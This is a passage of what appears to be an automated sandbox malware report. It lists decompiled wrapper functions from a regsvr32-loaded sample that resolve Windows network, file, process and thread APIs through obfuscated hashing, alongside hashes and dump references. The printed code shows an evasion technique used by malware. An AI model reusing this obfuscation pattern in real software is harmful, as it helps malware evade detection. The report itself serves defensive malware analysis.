				_v8 = _v8 / _t49;
				_v8 = _v8 ^ 0x0012f54b;
				E00406F64(0xeb82ce61, _t49, _t49, 0x2f4e66fe, 0xe9);
				_t47 = InternetReadFile(_a20, _a12, _a8, _a4); // executed
				return _t47;
			}

0x00405d7b
0x00405d7e
0x00405d81
0x00405d84
0x00405d87
0x00405d8a
0x00405d8f
0x00405d94
0x00405d9e
0x00405da7
0x00405dae
0x00405db5
0x00405dbc
0x00405dc3
0x00405dc7
0x00405dce
0x00405dd5
0x00405ddc
0x00405de5
0x00405ded
0x00405df0
0x00405e0c
0x00405e20
0x00405e25

APIs

InternetReadFile.WININET(?,0008D125,BBFDE73D,50EEDC75), ref: 00405E20

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 897db15161175b810be4cfaa30c783e411bddc61095917d6728a46e95a8c55ea
Instruction ID: 320f732657c38b072f9033b06e6cf2a87b2d532e88abbb94843654b51aee4beb
Opcode Fuzzy Hash: 897db15161175b810be4cfaa30c783e411bddc61095917d6728a46e95a8c55ea
Instruction Fuzzy Hash: 5E11167690020CFBDF05DFD5D94689EBFB2FB48344F108098F92466260D7B69B649F44

Uniqueness

Uniqueness Score: -1.00%

Function 004168D2 Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004168D2(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t29;
				void* _t36;
				struct _WIN32_FIND_DATAW* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00402528(_t29);
				_v20 = 0x726b1;
				_v16 = 0x89b8c;
				_v12 = 0xad06c9;
				_v12 = _v12 ^ 0xee9ed2d8;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x771db420;
				_v16 = 0x9e2a9b;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x154010d4;
				_v8 = 0xb13c5a;
				_v8 = _v8 * 0x56;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0xdc5977ab;
				E00406F64(0x9cf33bf6, __ecx, __ecx, 0xbfd2d08a, 0x135);
				_t36 = FindFirstFileW(_a12, _t40); // executed
				return _t36;
			}

0x004168d9
0x004168dc
0x004168de
0x004168e1
0x004168e4
0x004168e5
0x004168e6
0x004168eb
0x004168f5
0x004168fc
0x00416903
0x0041690a
0x0041690d
0x00416914
0x0041691b
0x0041691f
0x00416926
0x0041693d
0x00416945
0x00416949
0x00416959
0x00416965
0x0041696b

APIs

FindFirstFileW.KERNEL32(000726B1,?,?,?,?,?,?,?,?,?,00000067), ref: 00416965

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e5c8125531516c25727b455f320e6f568478ee8212139d8228870b8f72623d7a
Instruction ID: a454905aea11d72f264b56aad4c31f82f758070cba57e5145e9b8edef3a8f589
Opcode Fuzzy Hash: e5c8125531516c25727b455f320e6f568478ee8212139d8228870b8f72623d7a
Instruction Fuzzy Hash: 4C112771C01208FBCF15EFA5D9098DEBFB8EB04344F108099E816A7260D3B54B24DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0040E7C3(void* __ecx, _Unknown_base(*)()* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t37;
				void* _t43;
				_Unknown_base(*)()* _t48;

				_push(_a32);
				_t48 = __edx;
				_push(_a28);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E00402528(_t37);
				_v32 = 0x8a814;
				_v28 = 0x6e45f;
				_v24 = 0x86d6f;
				_v20 = 0;
				_v16 = 0x1fc846;
				_v16 = _v16 ^ 0x2b42bc12;
				_v16 = _v16 ^ 0x2a713a08;
				_v16 = _v16 ^ 0x012d4153;
				_v8 = 0x77095a;
				_v8 = _v8 + 0x87b;
				_v8 = _v8 + 0x97cb;
				_v8 = _v8 ^ 0x78197fc1;
				_v8 = _v8 ^ 0x786791fd;
				_v12 = 0xe36453;
				_v12 = _v12 ^ 0xf9975c93;
				_v12 = _v12 | 0x8e925f2b;
				_v12 = _v12 ^ 0xfff7711e;
				E00406F64(0x196a6714, __ecx, __ecx, 0xbfd2d08a, 0x41);
				_t43 = CreateThread(0, 0, _t48, _a4, 0, 0); // executed
				return _t43;
			}

0x0040e7cb
0x0040e7d0
0x0040e7d2
0x0040e7d5
0x0040e7d6
0x0040e7d7
0x0040e7d8
0x0040e7db
0x0040e7de
0x0040e7e1
0x0040e7e2
0x0040e7e3
0x0040e7e8
0x0040e7f2
0x0040e7f9
0x0040e800
0x0040e803
0x0040e80a
0x0040e811
0x0040e818
0x0040e81f
0x0040e826
0x0040e82d
0x0040e834
0x0040e83b
0x0040e842
0x0040e849
0x0040e850
0x0040e857
0x0040e875
0x0040e885
0x0040e88c

APIs

CreateThread.KERNEL32(00000000,00000000,0041E4E3,FFF7711E,00000000,00000000), ref: 0040E885

Strings

Zw, xrefs: 0040E81F
Sd, xrefs: 0040E842

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: Sd$Zw
API String ID: 2422867632-1586278526
Opcode ID: c1c685a2f094d5e3f506210eb950469866fc15e5840233bc05392294c2828e66
Instruction ID: 6631e246cc279d1fa1f6a43b3fa5804d1e08162c1bbec15d37822a2ae829500f
Opcode Fuzzy Hash: c1c685a2f094d5e3f506210eb950469866fc15e5840233bc05392294c2828e66
Instruction Fuzzy Hash: 0F114471C01248BBCF149FA6C94A8DFBFB9EB85704F108188B91866254C3B54A55DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00418545 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00418545(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t36;
				intOrPtr* _t42;
				void* _t43;

				E00402528(_t36);
				_v20 = 0x9794;
				_v16 = 0x912f0;
				_v8 = 0xec7142;
				_v8 = _v8 + 0xffffd1fe;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x0d1d13f0;
				_v8 = _v8 ^ 0x0d16173f;
				_v16 = 0xde55e6;
				_v16 = _v16 + 0xffffceee;
				_v16 = _v16 + 0x5e35;
				_v16 = _v16 ^ 0x00d8ed0f;
				_v12 = 0x90f238;
				_v12 = _v12 * 0x5a;
				_v12 = _v12 + 0x2dad;
				_v12 = _v12 ^ 0x32f59145;
				_t42 = E00406F64(0xb921acdb, __ecx, __ecx, 0xbfd2d08a, 0x16c);
				_t43 =  *_t42(_a8, 0, _a12, _a4, __ecx, __edx, _a4, _a8, _a12, 0, _a20); // executed
				return _t43;
			}

0x0041855b
0x00418560
0x0041856a
0x00418571
0x00418578
0x0041857f
0x00418583
0x0041858a
0x00418591
0x00418598
0x0041859f
0x004185a6
0x004185ad
0x004185c4
0x004185cc
0x004185d3
0x004185e3
0x004185f6
0x004185fb

APIs

QueryFullProcessImageNameW.KERNEL32(00D8ED0F,00000000,00009794,32F59145), ref: 004185F6

Strings

5^, xrefs: 0041859F
Bq, xrefs: 00418571

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID: 5^$Bq
API String ID: 3578328331-3260772785
Opcode ID: 699a3c34b93b042f77c5709cfd4678cf8df92478dd4dc61f83a23d1127278a65
Instruction ID: 159801b8736c1d36d0a7fec428922cda5681eab1333186d2272b2137c8f39a37
Opcode Fuzzy Hash: 699a3c34b93b042f77c5709cfd4678cf8df92478dd4dc61f83a23d1127278a65
Instruction Fuzzy Hash: 4A112B71C00308FBDF44DF94CD0AADDBBB1EB14304F108188E51476291D3759B649F44

Uniqueness

Uniqueness Score: -1.00%

Function 00409A53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00409A53(long __ecx, void* __edx, WCHAR* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a28, long _a32, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t59;
				void* _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				long _t85;

				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00402528(_t59);
				_v28 = 0xef6a1;
				_v24 = 0xe631;
				_v20 = 0x7a329;
				_v16 = 0xa016b8;
				_t73 = 0x60;
				_v16 = _v16 / _t73;
				_t74 = 0x3a;
				_v16 = _v16 / _t74;
				_v16 = _v16 + 0xffff6e82;
				_v16 = _v16 ^ 0xfff3db86;
				_v12 = 0xbda2be;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xffffa315;
				_v12 = _v12 + 0xffff64e8;
				_v12 = _v12 ^ 0x00128468;
				_v8 = 0x213d2c;
				_v8 = _v8 + 0xffff612c;
				_v8 = _v8 ^ 0x25eea302;
				_t75 = 0x49;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x0086bb13;
				E00406F64(0xa971fe6d, _t75, _t75, 0xbfd2d08a, 0x13d);
				_t71 = CreateFileW(_a4, _t85, _a16, 0, _a8, _a32, 0); // executed
				return _t71;
			}

0x00409a5b
0x00409a60
0x00409a62
0x00409a65
0x00409a66
0x00409a69
0x00409a6c
0x00409a6d
0x00409a70
0x00409a73
0x00409a76
0x00409a79
0x00409a7d
0x00409a7e
0x00409a83
0x00409a8d
0x00409a96
0x00409a9d
0x00409aa9
0x00409aae
0x00409ab6
0x00409abb
0x00409ac0
0x00409ac7
0x00409ace
0x00409ad5
0x00409ad9
0x00409ae0
0x00409ae7
0x00409aee
0x00409af5
0x00409afc
0x00409b06
0x00409b0e
0x00409b11
0x00409b2d
0x00409b44
0x00409b4b

APIs

CreateFileW.KERNEL32(00128468,?,0000E631,00000000,FFF3DB86,?,00000000), ref: 00409B44

Strings

,=!, xrefs: 00409AEE

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ,=!
API String ID: 823142352-3902226038
Opcode ID: 21ef4d96512464e3bdb0bd373705eab40f8c4b630813059ce09ca759d96b4822
Instruction ID: 31502d9555306a01ff0220a570dc1c2ae00ad10a1a418970267957f0d1f683fb
Opcode Fuzzy Hash: 21ef4d96512464e3bdb0bd373705eab40f8c4b630813059ce09ca759d96b4822
Instruction Fuzzy Hash: 8B312472D00208BFDF15CFA6DD498DEBBB6EB89314F108189F914661A0D7B29A259F90

Uniqueness

Uniqueness Score: -1.00%

Function 00403B61 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
networkCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00403B61(WCHAR* __ecx, void* __edx, WCHAR* _a12, long _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a48, void* _a52) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t42;
				void* _t50;
				signed int _t52;
				WCHAR* _t58;

				_push(_a52);
				_t58 = __ecx;
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E00402528(_t42);
				_v16 = 0x19eb8;
				_v12 = 0xcbfe45;
				_t52 = 0x70;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0xd06d64e2;
				_v12 = _v12 ^ 0xd0683084;
				_v16 = 0xcfaf37;
				_v16 = _v16 + 0xffffd52e;
				_v16 = _v16 ^ 0x00c425b5;
				_v8 = 0xb23325;
				_v8 = _v8 + 0x4e4c;
				_v8 = _v8 + 0xf80b;
				_v8 = _v8 + 0xffff29c4;
				_v8 = _v8 ^ 0x00b26403;
				E00406F64(0xa8f91228, _t52, _t52, 0x2f4e66fe, 0xa);
				_t50 = HttpOpenRequestW(_a52, _a12, _t58, 0, 0, 0, _a16, 0); // executed
				return _t50;
			}

0x00403b69
0x00403b6e
0x00403b70
0x00403b73
0x00403b74
0x00403b75
0x00403b78
0x00403b7b
0x00403b7e
0x00403b81
0x00403b84
0x00403b87
0x00403b8a
0x00403b8b
0x00403b8d
0x00403b8e
0x00403b93
0x00403b9d
0x00403bab
0x00403bb0
0x00403bb3
0x00403bba
0x00403bc1
0x00403bc8
0x00403bcf
0x00403bd6
0x00403bdd
0x00403be4
0x00403beb
0x00403bf2
0x00403c0e
0x00403c24
0x00403c2b

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,?,00000000), ref: 00403C24

Strings

LN, xrefs: 00403BDD

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: LN
API String ID: 1984915467-2356248161
Opcode ID: d8eb3df7fe0132940f32e49e506b79c0b677692e43437a14c534ab3e58ceca13
Instruction ID: c77cf110f94522bffaec7a1fe1911f8bdcb311c59afe3b9d2916ac142a98de62
Opcode Fuzzy Hash: d8eb3df7fe0132940f32e49e506b79c0b677692e43437a14c534ab3e58ceca13
Instruction Fuzzy Hash: 5C2123B2800249BBDF55DE96DC09CDFBFB5EB89704F108098F91462260D7B68A65DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00419229 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
networkCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00419229(void* __ecx, WCHAR* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t39;
				int _t47;
				WCHAR* _t52;

				_push(_a28);
				_t52 = __edx;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0xffffffff);
				E00402528(_t39);
				_v32 = 0x7a1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0x499c27;
				_v16 = _v16 * 0x4f;
				_v16 = _v16 + 0xffff320d;
				_v16 = _v16 ^ 0x16bb353a;
				_v8 = 0x17f576;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x797c7d78;
				_v8 = _v8 ^ 0xf02137de;
				_v8 = _v8 ^ 0xd68eba09;
				_v12 = 0x7982b4;
				_v12 = _v12 ^ 0xc84829b8;
				_v12 = _v12 + 0x6d70;
				_v12 = _v12 ^ 0xc8331a43;
				E00406F64(0x71e03c8a, __ecx, __ecx, 0x2f4e66fe, 0xef);
				_t47 = HttpSendRequestW(_a28, _t52, 0xffffffff, _a4, _a20); // executed
				return _t47;
			}

0x00419231
0x00419234
0x00419236
0x00419239
0x0041923c
0x0041923f
0x00419242
0x00419245
0x00419248
0x00419249
0x0041924b
0x00419250
0x0041925f
0x00419265
0x0041926d
0x00419273
0x0041927e
0x00419281
0x00419288
0x0041928f
0x00419296
0x0041929a
0x004192a1
0x004192a8
0x004192af
0x004192b6
0x004192bd
0x004192c4
0x004192d4
0x004192e8
0x004192ef

APIs

HttpSendRequestW.WININET(000D30BA,?,000000FF,C8331A43,?), ref: 004192E8

Strings

x}|y, xrefs: 0041929A

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: x}|y
API String ID: 360639707-2041926414
Opcode ID: 8c92506919c04608a92e60725b28dbdce51f2c4c849ec3fd85c21c4508792145
Instruction ID: 79eeb5d638a3535f5d66821998f8953ec6fd7a96b6d04af1250673070cd2712a
Opcode Fuzzy Hash: 8c92506919c04608a92e60725b28dbdce51f2c4c849ec3fd85c21c4508792145
Instruction Fuzzy Hash: 24212971C01209FBDF059FAACD458CEBFB5FF09310F108198F924662A1C7759A619F90

Uniqueness

Uniqueness Score: -1.00%

Function 00419E73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00419E73(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t30;
				intOrPtr* _t35;
				void* _t36;
				void* _t40;
				void* _t41;

				_t40 = __edx;
				_t41 = __ecx;
				E00402528(_t30);
				_v20 = _v20 & 0x00000000;
				_v28 = 0x644ee;
				_v24 = 0xfadd8;
				_v12 = 0xb12da2;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0xc19f0073;
				_v12 = _v12 ^ 0xc357482d;
				_v8 = 0xbf3247;
				_v8 = _v8 + 0xffffd7f4;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00087907;
				_v16 = 0xe304ff;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xc6022fb9;
				_t35 = E00406F64(0xcf7a5c9e, __ecx, __ecx, 0xbfd2d08a, 0x76);
				_t36 =  *_t35(_t40, _t41, __ecx, __edx, _a4, _a8, _a12); // executed
				return _t36;
			}

0x00419e7e
0x00419e80
0x00419e8a
0x00419e8f
0x00419e96
0x00419e9d
0x00419ea4
0x00419eab
0x00419eaf
0x00419eb6
0x00419ebd
0x00419ec4
0x00419ecb
0x00419ecf
0x00419ed6
0x00419edd
0x00419ee1
0x00419eff
0x00419f09
0x00419f10

APIs

ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000064), ref: 00419F09

Strings

s, xrefs: 00419EAF

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID: s
API String ID: 3779259828-453955339
Opcode ID: f8aae6705ede4c01b886f2e7e39dde3af2dc006ed921ffe4ec8bb0ac64bdfc96
Instruction ID: ee5148c59eb38c7727aea8b90f79c19bc80b904c0104e0b9cee1f655cd6bc66d
Opcode Fuzzy Hash: f8aae6705ede4c01b886f2e7e39dde3af2dc006ed921ffe4ec8bb0ac64bdfc96
Instruction Fuzzy Hash: A71179B2D0420CFBCB20EFE6D90A99EBFB4EF45308F208098E92572211D7B55B14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040D04C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040D04C(void* __ecx, struct tagPROCESSENTRY32W __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t31;
				int _t39;
				struct tagPROCESSENTRY32W _t43;

				_push(_a12);
				_t43 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00402528(_t31);
				_v20 = 0xecb85;
				_v16 = 0x67a62;
				_v12 = 0xcf6a5b;
				_v12 = _v12 * 0x61;
				_v12 = _v12 + 0xffff2b8a;
				_v12 = _v12 ^ 0x4e9e8e99;
				_v8 = 0x2d5e0d;
				_v8 = _v8 | 0x13dd92a5;
				_v8 = _v8 * 0x5e;
				_v8 = _v8 + 0xffff7cb2;
				_v8 = _v8 ^ 0x5739a498;
				_v16 = 0xc65629;
				_v16 = _v16 + 0x4cd3;
				_v16 = _v16 ^ 0x00c76bfa;
				E00406F64(0xa9eeb584, __ecx, __ecx, 0xbfd2d08a, 0xa9);
				_t39 = Process32NextW(_a12, _t43); // executed
				return _t39;
			}

0x0040d053
0x0040d056
0x0040d058
0x0040d05b
0x0040d05e
0x0040d05f
0x0040d060
0x0040d065
0x0040d06f
0x0040d076
0x0040d08d
0x0040d095
0x0040d09c
0x0040d0a3
0x0040d0aa
0x0040d0b5
0x0040d0b8
0x0040d0bf
0x0040d0c6
0x0040d0cd
0x0040d0d4
0x0040d0e4
0x0040d0f0
0x0040d0f6

APIs

Process32NextW.KERNEL32(000ECB85,?,?,?,?,?,?,?,?,?,00000000), ref: 0040D0F0

Strings

^-, xrefs: 0040D0A3

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID: ^-
API String ID: 1850201408-2524866286
Opcode ID: 523474fb17bfda66cac69258083ab36a993d9a455f67718ecd8e198b92064d6d
Instruction ID: f9d4755d5279add8a23a8fbd2b7dabc29d82917efec668bad1186c3ac6d9f46b
Opcode Fuzzy Hash: 523474fb17bfda66cac69258083ab36a993d9a455f67718ecd8e198b92064d6d
Instruction Fuzzy Hash: 651125B1C01208FBDF14DFA9C94A8CEBFB4EF00314F108599E918B62A0D3B54B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C64F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040C64F(void* __ecx, void* __edx, void* _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t37;
				int _t44;
				void* _t48;

				_push(_a12);
				_t48 = __ecx;
				_push(0);
				_push(_a4);
				_push(__ecx);
				E00402528(_t37);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x731cf;
				_v16 = 0x52af02;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 ^ 0x981bd65c;
				_v16 = _v16 ^ 0x777ba148;
				_v16 = _v16 ^ 0xef619e17;
				_v12 = 0xb2e884;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffffa03d;
				_v12 = _v12 | 0x77b26ce8;
				_v12 = _v12 ^ 0x7fb91f06;
				_v8 = 0x719f4c;
				_v8 = _v8 ^ 0x58808d53;
				_v8 = _v8 << 1;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 ^ 0x10f283ef;
				E00406F64(0x4f0c2faa, __ecx, __ecx, 0xbfd2d08a, 0x1f9);
				_t44 = HeapFree(_t48, 0, _a4); // executed
				return _t44;
			}

0x0040c656
0x0040c659
0x0040c65b
0x0040c65d
0x0040c661
0x0040c662
0x0040c667
0x0040c66e
0x0040c675
0x0040c67c
0x0040c680
0x0040c687
0x0040c68e
0x0040c695
0x0040c69c
0x0040c6a0
0x0040c6a7
0x0040c6ae
0x0040c6b5
0x0040c6bc
0x0040c6c3
0x0040c6d6
0x0040c6de
0x0040c6ee
0x0040c6fc
0x0040c702

APIs

HeapFree.KERNEL32(00000000,00000000,7FB91F06,?,?,?,?,?,?,?,?,00000063), ref: 0040C6FC

Strings

B-, xrefs: 0040C64F

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: B-
API String ID: 3298025750-3584647927
Opcode ID: 60bab4379e34f5b16149dd9469359ed78454ebf68c4c38b512593ac3b519ec88
Instruction ID: 82022e515ba81510e259dd6560cc395a2323546a6c5df716259a98a8f655e7b0
Opcode Fuzzy Hash: 60bab4379e34f5b16149dd9469359ed78454ebf68c4c38b512593ac3b519ec88
Instruction Fuzzy Hash: 511134B5D0121CFBDB04EFA9D906ADEBBB4EB00304F608099E416A3291D3B95B149F95

Uniqueness

Uniqueness Score: -1.00%

Function 00414FB8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00414FB8(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t26;
				int _t33;
				void* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__ecx);
				E00402528(_t26);
				_v32 = 0x1fdfe;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0xd7cabc;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xaf947812;
				_v12 = 0xfcfc14;
				_v12 = _v12 + 0xffffa733;
				_v12 = _v12 ^ 0x00f70671;
				_v8 = 0x27786a;
				_v8 = _v8 + 0xffff8bfa;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x6e53b40f;
				_v8 = _v8 ^ 0x6e7f6462;
				E00406F64(0x3fc2ff72, __ecx, __ecx, 0xbfd2d08a, 0x8a);
				_t33 = CloseHandle(_t38); // executed
				return _t33;
			}

0x00414fc0
0x00414fc3
0x00414fc6
0x00414fc7
0x00414fcc
0x00414fdb
0x00414fe1
0x00414fe9
0x00414fef
0x00414ff6
0x00414ffa
0x00415001
0x00415008
0x0041500f
0x00415016
0x0041501d
0x00415024
0x0041502b
0x00415032
0x00415042
0x0041504b
0x00415052

APIs

CloseHandle.KERNEL32(00008331,?,?,?,?,?,?,?), ref: 0041504B

Strings

jx', xrefs: 00415016

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

